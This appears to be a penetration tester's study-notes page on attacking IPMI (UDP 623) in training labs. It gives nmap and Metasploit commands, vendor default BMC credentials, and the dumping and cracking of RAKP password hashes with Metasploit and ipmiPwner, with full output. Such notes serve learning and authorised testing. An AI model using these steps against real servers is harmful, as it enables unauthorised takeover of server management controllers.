IPMI (623 UDP)
Theory
Intelligent Platform Management Interface (IPMI) is a set of standardized specifications for hardware-based host management systems used for system management and monitoring. It acts as an autonomous subsystem and works independently of the host's BIOS, CPU, firmware, and underlying operating system. IPMI provides sysadmins with the ability to manage and monitor systems even if they are powered off or in an unresponsive state.
Version
sudo nmap -sU --script ipmi-version -p 623 ilo.inlanfreight.localmsf6 > use auxiliary/scanner/ipmi/ipmi_version
msf6 auxiliary(scanner/ipmi/ipmi_version) > set rhosts 10.129.42.195
msf6 auxiliary(scanner/ipmi/ipmi_version) > show options
Module options (auxiliary/scanner/ipmi/ipmi_version):
Name Current Setting Required Description
---- --------------- -------- -----------
BATCHSIZE 256 yes The number of hosts to probe in each set
RHOSTS 10.129.42.195 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 623 yes The target port (UDP)
THREADS 10 yes The number of concurrent threads
msf6 auxiliary(scanner/ipmi/ipmi_version) > run
[*] Sending IPMI requests to 10.129.42.195->10.129.42.195 (1 hosts)
[+] 10.129.42.195:623 - IPMI - IPMI-2.0 UserAuth(auth_msg, auth_user, non_null_user) PassAuth(password, md5, md2, null) Level(1.5, 2.0)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completedDefault password
Dell iDRAC
root
calvin
HP iLO
Administrator
randomized 8-character string consisting of numbers and uppercase letters
Supermicro IPMI
ADMIN
ADMIN
Metasploit Wordlists
ls /opt/tools/metasploit-framework/data/wordlists/ | grep ipmi
ipmi_passwords.txt
ipmi_users.txtGet password
HashesMetasploit Dumping Hashes
msf6 > use auxiliary/scanner/ipmi/ipmi_dumphashes
msf6 auxiliary(scanner/ipmi/ipmi_dumphashes) > set rhosts 10.129.42.195
msf6 auxiliary(scanner/ipmi/ipmi_dumphashes) > show options
Module options (auxiliary/scanner/ipmi/ipmi_dumphashes):
Name Current Setting Required Description
---- --------------- -------- -----------
CRACK_COMMON true yes Automatically crack common passwords as they are obtained
OUTPUT_HASHCAT_FILE no Save captured password hashes in hashcat format
OUTPUT_JOHN_FILE no Save captured password hashes in john the ripper format
PASS_FILE /usr/share/metasploit-framework/data/wordlists/ipmi_passwords.txt yes File containing common passwords for offline cracking, one per line
RHOSTS 10.129.42.195 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 623 yes The target port
THREADS 1 yes The number of concurrent threads (max one per host)
USER_FILE /usr/share/metasploit-framework/data/wordlists/ipmi_users.txt yes File containing usernames, one per line
msf6 auxiliary(scanner/ipmi/ipmi_dumphashes) > run
[+] 10.129.42.195:623 - IPMI - Hash found: ADMIN:8e160d4802040000205ee9253b6b8dac3052c837e23faa631260719fce740d45c3139a7dd4317b9ea123456789abcdefa123456789abcdef140541444d494e:a3e82878a09daa8ae3e6c22f9080f8337fe0ed7e
[+] 10.129.42.195:623 - IPMI - Hash for user 'ADMIN' matches password 'ADMIN'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
cat ipmi.txt
a870af384080000fcb12dffed486b2d2307f417d3261a28f099e9b1b0fe99d1f77f2b940cfba668a123456789abcdefa123456789abcdef140561646d696e:9d0c8a64d4b9cf7482ba54a9056e6b147777e025I don't know why but hashcat didn't find the password :(
ipmiPwner
Apr 06, 2024 - 05:26:05 (EDT) exegol-CPTS ipmiPwner # python3 ipmipwner.py --host 10.129.154.218 -u admin -c python -pW /usr/share/wordlists/rockyou.txt -oH hash -oC crackedHash
[*] Checking if port 623 for host 10.129.154.218 is active
[*] The username: admin is valid
[*] Saving hash for user: admin in file: "hash"
[*] The hash for user: admin
\_ $rakp$a4a3a2a0020d0000bf76f5a3737701b46b64c3b9cab48c6c6857615420edfc7400a0a78e287b7f9fa123456789abcdefa123456789abcdef140561646d696e$eb76dd944123865bbaeab7e9503bdfc1d741c56a
[*] Starting the hash cracking with python
[*] Reading the wordlist by chunks
[*] Chunk size: 1048576
[*] Reading Bytes: 139921497/139921497
[*] Hash Cracking Started
[+] Password Found, Cracked on line: [613]
[+] The password: trinity
[+] Time elapsed: 0.00254
[+] Result saved in: crackedHash
[Apr 06, 2024 - 05:26:58 (EDT)] exegol-CPTS ipmiPwner # cat crackedHash
$rakp$a4a3a2a0020d0000bf76f5a3737701b46b64c3b9cab48c6c6857615420edfc7400a0a78e287b7f9fa123456789abcdefa123456789abcdef140561646d696e$eb76dd944123865bbaeab7e9503bdfc1d741c56a:t*****y
Time elapsed: 0.00254
[Apr 06, 2024 - 05:27:19 (EDT)] exegol-CPTS ipmiPwner #Resources
Interesting Books
Interesting BooksNmap Network Scanning The official guide to the Nmap Security Scanner, a free and open source utility used by millions of people for network discovery, administration, and security auditing. From explaining port scanning basics for novices to detailing low-level packet crafting methods used by advanced hackers, this book by Nmap's original author suits all levels of security and networking professionals.
The Art of Network Penetration Testing A guide to simulating an internal security breach. You’ll take on the role of the attacker and work through every stage of a professional pentest, from information gathering to seizing control of a system and owning the network.
Network Basics for Hackers The book offers one of the most complete and in-depth analyses of Wi-Fi and Bluetooth networks, then progresses through the various protocols such as DNS, ARP, SMTP, and others.
Support this Gitbook
I hope it helps you as much as it has helped me. If you can support me in any way, I would deeply appreciate it.
Last updated